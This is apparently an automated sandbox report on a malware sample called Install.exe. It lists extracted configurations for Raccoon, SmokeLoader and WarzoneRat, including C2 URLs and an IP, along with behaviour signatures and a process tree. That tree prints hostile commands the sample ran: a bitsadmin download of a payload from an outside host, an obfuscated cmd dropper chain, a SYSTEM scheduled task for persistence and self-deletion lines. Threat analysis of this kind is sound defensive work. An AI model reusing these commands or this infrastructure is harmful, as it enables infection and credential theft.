Resubmissions

24-04-2021 06:39

210424-lmjja25q22 10

23-04-2021 19:10

210423-f6mvfx4yyx 10

23-04-2021 19:10

210423-3qnl3etjca 10

23-04-2021 18:20

210423-4keqsccdba 10

23-04-2021 13:38

210423-1f2d5v8a2s 10

23-04-2021 04:53

210423-eenyvz5kqj 10

23-04-2021 04:53

210423-svr8rrwggs 10

23-04-2021 04:53

210423-95h13plc2x 10

22-04-2021 19:11

210422-6s1zd291s6 10

22-04-2021 19:05

210422-dsvj9bzkvn 10

Analysis

  • max time kernel
    1802s
  • max time network
    1807s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    23-04-2021 13:38

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Extracted

Family

warzonerat

C2

104.207.138.207:4531

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • TelegramRat 1 IoCs

    Telegram_rat.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Nirsoft 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 41 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Install.exe
    "C:\Users\Admin\AppData\Local\Temp\Install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:672
    • C:\Users\Admin\AppData\Local\Temp\is-71FVL.tmp\Install.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-71FVL.tmp\Install.tmp" /SL5="$7002E,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3936
      • C:\Users\Admin\AppData\Local\Temp\is-95I0P.tmp\Ultra.exe
        "C:\Users\Admin\AppData\Local\Temp\is-95I0P.tmp\Ultra.exe" /S /UID=burnerch1
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops file in Program Files directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3580
        • C:\Program Files\Reference Assemblies\EEUTKFYAHK\ultramediaburner.exe
          "C:\Program Files\Reference Assemblies\EEUTKFYAHK\ultramediaburner.exe" /VERYSILENT
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1564
          • C:\Users\Admin\AppData\Local\Temp\is-63TRH.tmp\ultramediaburner.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-63TRH.tmp\ultramediaburner.tmp" /SL5="$40070,281924,62464,C:\Program Files\Reference Assemblies\EEUTKFYAHK\ultramediaburner.exe" /VERYSILENT
            5⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:2116
            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
              6⤵
              • Executes dropped EXE
              PID:2236
        • C:\Users\Admin\AppData\Local\Temp\a7-a5011-0db-586a3-38397edd4e7f5\Daelepicosho.exe
          "C:\Users\Admin\AppData\Local\Temp\a7-a5011-0db-586a3-38397edd4e7f5\Daelepicosho.exe"
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Modifies system certificate store
          • Suspicious use of AdjustPrivilegeToken
          PID:4032
        • C:\Users\Admin\AppData\Local\Temp\7e-b5f79-efc-82ab7-4f9584dfd21c7\Rihohotozhae.exe
          "C:\Users\Admin\AppData\Local\Temp\7e-b5f79-efc-82ab7-4f9584dfd21c7\Rihohotozhae.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2576
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5aqdb5ah.wgv\instEU.exe & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4484
            • C:\Users\Admin\AppData\Local\Temp\5aqdb5ah.wgv\instEU.exe
              C:\Users\Admin\AppData\Local\Temp\5aqdb5ah.wgv\instEU.exe
              6⤵
              • Executes dropped EXE
              PID:4836
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fmfb1v2b.1yt\gpooe.exe & exit
            5⤵
              PID:4956
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2k3kvzli.ixq\google-game.exe & exit
              5⤵
                PID:4288
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xvfehce5.jnu\md1_1eaf.exe & exit
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4956
                • C:\Users\Admin\AppData\Local\Temp\xvfehce5.jnu\md1_1eaf.exe
                  C:\Users\Admin\AppData\Local\Temp\xvfehce5.jnu\md1_1eaf.exe
                  6⤵
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4104
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1bb04sxl.wzi\y1.exe & exit
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4624
                • C:\Users\Admin\AppData\Local\Temp\1bb04sxl.wzi\y1.exe
                  C:\Users\Admin\AppData\Local\Temp\1bb04sxl.wzi\y1.exe
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:2712
                  • C:\Users\Admin\AppData\Local\Temp\L9CvLqDUX8.exe
                    "C:\Users\Admin\AppData\Local\Temp\L9CvLqDUX8.exe"
                    7⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    PID:5444
                    • C:\Users\Admin\AppData\Roaming\1619192216446.exe
                      "C:\Users\Admin\AppData\Roaming\1619192216446.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619192216446.txt"
                      8⤵
                      • Executes dropped EXE
                      PID:3116
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\L9CvLqDUX8.exe"
                      8⤵
                        PID:4568
                        • C:\Windows\SysWOW64\PING.EXE
                          ping 127.0.0.1 -n 3
                          9⤵
                          • Runs ping.exe
                          PID:6012
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1bb04sxl.wzi\y1.exe"
                      7⤵
                        PID:5852
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:5940
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dfseg5d1.qre\toolspab1.exe & exit
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4428
                    • C:\Users\Admin\AppData\Local\Temp\dfseg5d1.qre\toolspab1.exe
                      C:\Users\Admin\AppData\Local\Temp\dfseg5d1.qre\toolspab1.exe
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:4840
                      • C:\Users\Admin\AppData\Local\Temp\dfseg5d1.qre\toolspab1.exe
                        C:\Users\Admin\AppData\Local\Temp\dfseg5d1.qre\toolspab1.exe
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:1156
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oootqhsx.vcv\SunLabsPlayer.exe /S & exit
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4904
                    • C:\Users\Admin\AppData\Local\Temp\oootqhsx.vcv\SunLabsPlayer.exe
                      C:\Users\Admin\AppData\Local\Temp\oootqhsx.vcv\SunLabsPlayer.exe /S
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops file in Program Files directory
                      PID:4632
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                        7⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4488
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                        7⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5036
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                        7⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:696
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                        7⤵
                          PID:5228
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                          7⤵
                            PID:4792
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                            7⤵
                              PID:4660
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                              7⤵
                              • Checks for any installed AV software in registry
                              PID:5256
                            • C:\Windows\SysWOW64\bitsadmin.exe
                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                              7⤵
                              • Download via BitsAdmin
                              PID:816
                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pC2KRn2c9fiF7FlK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                              7⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              PID:5136
                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -plg2ZLYGSphKc5Eq -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                              7⤵
                              • Executes dropped EXE
                              PID:4120
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                              7⤵
                                PID:4468
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                                7⤵
                                  PID:5016
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                                  7⤵
                                    PID:688
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                                    7⤵
                                      PID:6004
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                                      7⤵
                                        PID:4792
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AotYqZ\AotYqZ.dll" AotYqZ
                                        7⤵
                                        • Loads dropped DLL
                                        PID:5572
                                        • C:\Windows\system32\rundll32.exe
                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AotYqZ\AotYqZ.dll" AotYqZ
                                          8⤵
                                          • Loads dropped DLL
                                          • Drops file in System32 directory
                                          PID:1460
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                                        7⤵
                                          PID:5692
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            8⤵
                                              PID:5228
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                                            7⤵
                                            • Drops file in Program Files directory
                                            PID:5636
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                                            7⤵
                                              PID:2416
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                                              7⤵
                                                PID:5900
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsg5556.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:5860
                                                • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:6112
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eiini2at.uad\GcleanerWW.exe /mixone & exit
                                              5⤵
                                                PID:4968
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ly3rycp4.byw\inst.exe & exit
                                                5⤵
                                                  PID:4568
                                                  • C:\Users\Admin\AppData\Local\Temp\ly3rycp4.byw\inst.exe
                                                    C:\Users\Admin\AppData\Local\Temp\ly3rycp4.byw\inst.exe
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:5000
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mj0j3bos.yfa\c7ae36fa.exe & exit
                                                  5⤵
                                                    PID:4328
                                                    • C:\Users\Admin\AppData\Local\Temp\mj0j3bos.yfa\c7ae36fa.exe
                                                      C:\Users\Admin\AppData\Local\Temp\mj0j3bos.yfa\c7ae36fa.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Checks SCSI registry key(s)
                                                      • Suspicious behavior: MapViewOfSection
                                                      PID:4696
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vx3kpp00.tji\app.exe /8-2222 & exit
                                                    5⤵
                                                      PID:4512
                                                      • C:\Users\Admin\AppData\Local\Temp\vx3kpp00.tji\app.exe
                                                        C:\Users\Admin\AppData\Local\Temp\vx3kpp00.tji\app.exe /8-2222
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4524
                                                        • C:\Users\Admin\AppData\Local\Temp\vx3kpp00.tji\app.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\vx3kpp00.tji\app.exe" /8-2222
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Modifies data under HKEY_USERS
                                                          PID:5540
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                              1⤵
                                              • Drops file in Windows directory
                                              • Modifies Internet Explorer settings
                                              • Modifies registry class
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of SetWindowsHookEx
                                              PID:2208
                                            • C:\Windows\system32\browser_broker.exe
                                              C:\Windows\system32\browser_broker.exe -Embedding
                                              1⤵
                                              • Modifies Internet Explorer settings
                                              PID:4848
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                              1⤵
                                              • Modifies registry class
                                              • Suspicious behavior: MapViewOfSection
                                              • Suspicious use of SetWindowsHookEx
                                              • Suspicious use of WriteProcessMemory
                                              PID:4572
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                              1⤵
                                              • Modifies Internet Explorer settings
                                              • Modifies registry class
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4892
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                              1⤵
                                              • Modifies registry class
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1124
                                            • \??\c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                              1⤵
                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5428
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                              1⤵
                                              • Modifies registry class
                                              PID:5876
                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                              1⤵
                                              • Modifies registry class
                                              PID:5624
                                            • C:\Users\Admin\AppData\Local\Temp\3063.exe
                                              C:\Users\Admin\AppData\Local\Temp\3063.exe
                                              1⤵
                                              • Executes dropped EXE
                                              • Drops startup file
                                              • NTFS ADS
                                              PID:5188
                                            • C:\Users\Admin\AppData\Local\Temp\3584.exe
                                              C:\Users\Admin\AppData\Local\Temp\3584.exe
                                              1⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:5400
                                            • C:\Users\Admin\AppData\Local\Temp\3FA7.exe
                                              C:\Users\Admin\AppData\Local\Temp\3FA7.exe
                                              1⤵
                                              • Executes dropped EXE
                                              PID:5832
                                            • C:\Users\Admin\AppData\Local\Temp\4797.exe
                                              C:\Users\Admin\AppData\Local\Temp\4797.exe
                                              1⤵
                                              • Executes dropped EXE
                                              PID:5744
                                            • C:\Users\Admin\AppData\Local\Temp\517B.exe
                                              C:\Users\Admin\AppData\Local\Temp\517B.exe
                                              1⤵
                                              • Executes dropped EXE
                                              PID:2260
                                              • C:\Windows\SysWOW64\makecab.exe
                                                "C:\Windows\System32\makecab.exe"
                                                2⤵
                                                  PID:5964
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c iqNOHdjFJRyhysPKrZOyDFL & okDksJPSlGbcVRHiSeznxx & hAaVTUKoBgyGcM & gqwjrmT & cmd < Estate.wms
                                                  2⤵
                                                    PID:4216
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd
                                                      3⤵
                                                        PID:6040
                                                        • C:\Windows\SysWOW64\findstr.exe
                                                          findstr /V /R "^IRYjqEeSlHqUOmgNEQyuRToTmXianaMtsAbasYwuofIOxmdrAdyKMFuPItNebJxSVVDheWcGOYXClxmZHrSojeaLxIJhlZImVQSnVewEUmVNHEEgENczQjFTDRTzjocPdnGzBwrEwghMuFtPrc$" Tele.wms
                                                          4⤵
                                                            PID:5612
                                                          • C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\Diritto.exe.com
                                                            Diritto.exe.com o
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:2760
                                                            • C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\Diritto.exe.com
                                                              C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\Diritto.exe.com o
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:5244
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks.exe /create /tn "xNBSMJllYe" /tr "C:\\Users\\Admin\\AppData\\Roaming\\gXjmjGiawO\\xNBSMJllYe.exe.com C:\\Users\\Admin\\AppData\\Roaming\\gXjmjGiawO\\Q" /sc onstart /F /RU SYSTEM
                                                                6⤵
                                                                • Creates scheduled task(s)
                                                                PID:5464
                                                              • C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\RegAsm.exe
                                                                C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\RegAsm.exe
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:2400
                                                          • C:\Windows\SysWOW64\PING.EXE
                                                            ping 127.0.0.1 -n 30
                                                            4⤵
                                                            • Runs ping.exe
                                                            PID:5772
                                                    • C:\Windows\SysWOW64\explorer.exe
                                                      C:\Windows\SysWOW64\explorer.exe
                                                      1⤵
                                                        PID:5108
                                                      • C:\Windows\explorer.exe
                                                        C:\Windows\explorer.exe
                                                        1⤵
                                                          PID:6036
                                                        • C:\Windows\SysWOW64\explorer.exe
                                                          C:\Windows\SysWOW64\explorer.exe
                                                          1⤵
                                                            PID:6132
                                                          • C:\Windows\explorer.exe
                                                            C:\Windows\explorer.exe
                                                            1⤵
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:5480
                                                          • C:\Windows\SysWOW64\explorer.exe
                                                            C:\Windows\SysWOW64\explorer.exe
                                                            1⤵
                                                              PID:4604
                                                            • C:\Windows\explorer.exe
                                                              C:\Windows\explorer.exe
                                                              1⤵
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:5620
                                                            • C:\Windows\SysWOW64\explorer.exe
                                                              C:\Windows\SysWOW64\explorer.exe
                                                              1⤵
                                                                PID:5560
                                                              • C:\Windows\explorer.exe
                                                                C:\Windows\explorer.exe
                                                                1⤵
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:4612
                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                C:\Windows\SysWOW64\explorer.exe
                                                                1⤵
                                                                  PID:5072
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                  1⤵
                                                                    PID:4404
